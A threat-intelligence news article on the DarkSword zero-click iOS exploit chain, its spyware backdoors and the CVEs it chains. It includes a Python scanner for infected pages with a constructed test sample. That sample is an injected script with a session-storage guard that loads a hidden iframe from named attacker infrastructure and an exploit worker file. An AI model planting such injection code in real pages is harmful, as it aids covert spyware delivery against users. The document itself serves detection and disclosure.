iOS Exploit With iPhone Hacking Tools Attacking Users to Steal Data
Google’s Threat Intelligence Group (GTIG) has exposed DarkSword, a sophisticated full-chain iOS exploit targeting versions 18.4 to 18.7. This zero-click attack chains six vulnerabilities, four of which are exploited as zero-days, to grant attackers kernel-level access and deploy malware such as GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER.
Since November 2025, DarkSword has surfaced in campaigns by diverse actors, including commercial spyware firms and state-sponsored groups.
UNC6748 targeted Saudi users via a Snapchat-mimicking site (snapshare[.]chat), using obfuscated JavaScript and IFrames to load the exploit while avoiding repeat infections through session storage checks. The chain evolved to add support for iOS 18.6 and 18.7 through loaders that fetch version-specific RCE modules such as rce_worker_18.4.js, although those loaders contained logic bugs.
PARS Defense, a Turkish vendor, deployed DarkSword in Turkey (November 2025) and Malaysia (January 2026) with stronger OPSEC: encrypted payloads via ECDH/AES and device fingerprinting (e.g., Apple Pay checks, WebGL2 support). Their loaders correctly selected version-specific RCE workers, redirecting non-iOS devices to legitimate sites.
UNC6353, a suspected Russian espionage cluster, shifted from Coruna to DarkSword in Ukrainian watering holes by December 2025, persisting into March 2026. Malicious scripts on compromised sites loaded hidden IFRAMEs from static resources on cdncounter[.]net, bypassing checks with Russian-commented code. GTIG collaborated with CERT-UA on mitigation.
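The three delivery patterns above share observable traits on the compromised or lure page: a hidden IFRAME pointing at attacker infrastructure, a sessionStorage flag used as a re-infection guard, and version-specific module names such as rce_worker_18.4.js. The following page scanner is an added example written for this article (not GTIG or vendor code); the domains and module names come from the reporting above, and the two HTML samples are constructed.

```python
import re

# Domains named in the reporting above (defanged there as snapshare[.]chat, cdncounter[.]net).
IOC_DOMAINS = {"snapshare.chat", "cdncounter.net"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Attributes or inline CSS that make a frame invisible to the user.
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?0\b|(?<![-\w])hidden\b",
    re.IGNORECASE)
# Module file names listed in the exploit table of the article.
MODULE_RE = re.compile(r"\b(?:rce_worker_\d+\.\d+|rce_module|sbx0_main|pe_main)\.js\b", re.IGNORECASE)
# The re-infection guard: a sessionStorage flag consulted before loading the chain.
GUARD_RE = re.compile(r"sessionStorage\.(?:getItem|setItem)\(", re.IGNORECASE)

def host_of(url):
    m = re.match(r"(?:https?:)?//([^/:?#]+)", url.strip())
    return m.group(1).lower() if m else None

def is_ioc_host(host):
    return bool(host) and any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)

def scan_page(html):
    """Return (verdict, findings) for one fetched HTML document."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        src = SRC_RE.search(tag)
        host = host_of(src.group(1)) if src else None
        hidden = bool(HIDDEN_RE.search(tag))
        if is_ioc_host(host):
            findings.append(("ioc_iframe", host))
        elif hidden:
            findings.append(("hidden_iframe", host or "inline"))
    for m in MODULE_RE.finditer(html):
        findings.append(("exploit_module", m.group(0)))
    if GUARD_RE.search(html):
        findings.append(("session_guard", "sessionStorage"))
    kinds = {k for k, _ in findings}
    if kinds & {"ioc_iframe", "exploit_module"}:
        return "malicious", findings          # a known indicator is conclusive
    if {"hidden_iframe", "session_guard"} <= kinds:
        return "suspicious", findings         # loader-like shape, unknown host
    return "clean", findings

# Constructed sample: a compromised page injecting a hidden frame and a versioned worker.
SAMPLE_COMPROMISED = """<html><body><p>news</p>
<script>if(!sessionStorage.getItem('v')){sessionStorage.setItem('v','1');
document.body.innerHTML += '<iframe src="//cdn.cdncounter.net/x.html" style="display:none"></iframe>';}</script>
<script src="rce_worker_18.4.js"></script></body></html>"""
SAMPLE_CLEAN = '<html><body><iframe src="https://www.youtube.com/embed/x" width="560"></iframe></body></html>'

if __name__ == "__main__":
    for name, doc in (("compromised", SAMPLE_COMPROMISED), ("clean", SAMPLE_CLEAN)):
        print(name, *scan_page(doc))
```

A visible benign embed with no session guard stays "clean", while a hidden frame to an unknown host combined with a sessionStorage guard is only "suspicious", which keeps the rule useful for triage without treating every hidden iframe as an infection.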
Post-compromise, DarkSword installs JavaScript backdoors tailored to actors.
- GHOSTKNIFE (UNC6748): Exfiltrates accounts, messages, browser data, location, and audio; supports screenshots, file downloads, and config updates over encrypted HTTP (ECDH/AES). It stores data in /tmp/<UUID>.<numbers>/STORAGE/, erases crash logs (e.g., mediaplaybackd, SpringBoard), and uses custom binary protocols.
- GHOSTSABER (PARS Defense): Enumerates devices/accounts, lists files/apps, runs SQLite queries, exfiltrates Photos thumbnails, and executes JS. Table 1 outlines commands such as SendDeviceInfo, ExecuteSqliteQuery, and unimplemented ones (e.g., RecordAudio), hinting at modular extensions via shared memory.
| Command | Description |
|---|---|
| ChangeStatusCheckSleepInterval | Adjusts C2 check-in intervals |
| SendDeviceInfo | Uploads device details |
| ExecuteSqliteQuery | Runs SQL on databases |
| SendThumbnails | Exfiltrates Photos thumbnails |
| EvalJs | Executes arbitrary JavaScript |
- GHOSTBLADE (UNC6353): A dataminer harvesting iMessage, Telegram, photos, crypto wallets, Safari history, and more (Table 2). It deletes diagnostic reports, includes debug logs, and has iOS 18.4+ migbypass for autobox evasion, suggesting broader compatibility.
| Category | Data Targeted |
|---|---|
| Communication | iMessage, WhatsApp, calls |
| Identity | Keychains, SIM info |
| Location | History, WiFi passwords |
| Media | Photos, iCloud Drive |
| Financials | Crypto wallets |
DarkSword’s JavaScript-only chain avoids PPL/SPTM bypasses, using Web Workers for RCE. It starts with JavaScriptCore flaws:
- CVE-2025-31277 (iOS 18.4-18.5): JIT type confusion, patched in iOS 18.6.
- CVE-2025-43529 (18.6-18.7): DFG garbage collection bug, zero-day, patched 18.7.3/26.2.
Chained with CVE-2026-20700 (dyld PAC bypass, zero-day, patched in iOS 26.3).
Sandbox escapes pivot WebContent → GPU (CVE-2025-14174, ANGLE OOB, zero-day, patched 18.7.3/26.2) → mediaplaybackd (CVE-2025-43510, XNU copy-on-write, patched 18.7.2/26.1). A final bug, CVE-2025-43520 (XNU VFS race, patched 18.7.2/26.1), yields kernel read/write primitives, allowing the payload to load libraries such as Native.js, FileUtils.js, and TaskRop.
| Module | CVE | Type | Zero-Day? | Patched In |
|---|---|---|---|---|
| rce_module.js | 2025-31277 | JSC memory corruption | No | 18.6 |
| rce_worker_*.js | 2026-20700 | dyld PAC bypass | Yes | 26.3 |
| sbx0_main.js | 2025-14174 | ANGLE memory corruption | Yes | 18.7.3/26.2 |
| pe_main.js | 2025-43520 | XNU VFS race | No | 18.7.2/26.1 |
GTIG reported the flaws to Apple in late 2025; the delivery domains are blocked via Safe Browsing. Update to iOS 26.3+ or enable Lockdown Mode.
DarkSword echoes Coruna’s proliferation, fueling espionage and surveillance. GTIG, Lookout, and iVerify urge vigilance amid rising exploit-as-a-service threats.
Site: cybersecuritypath.com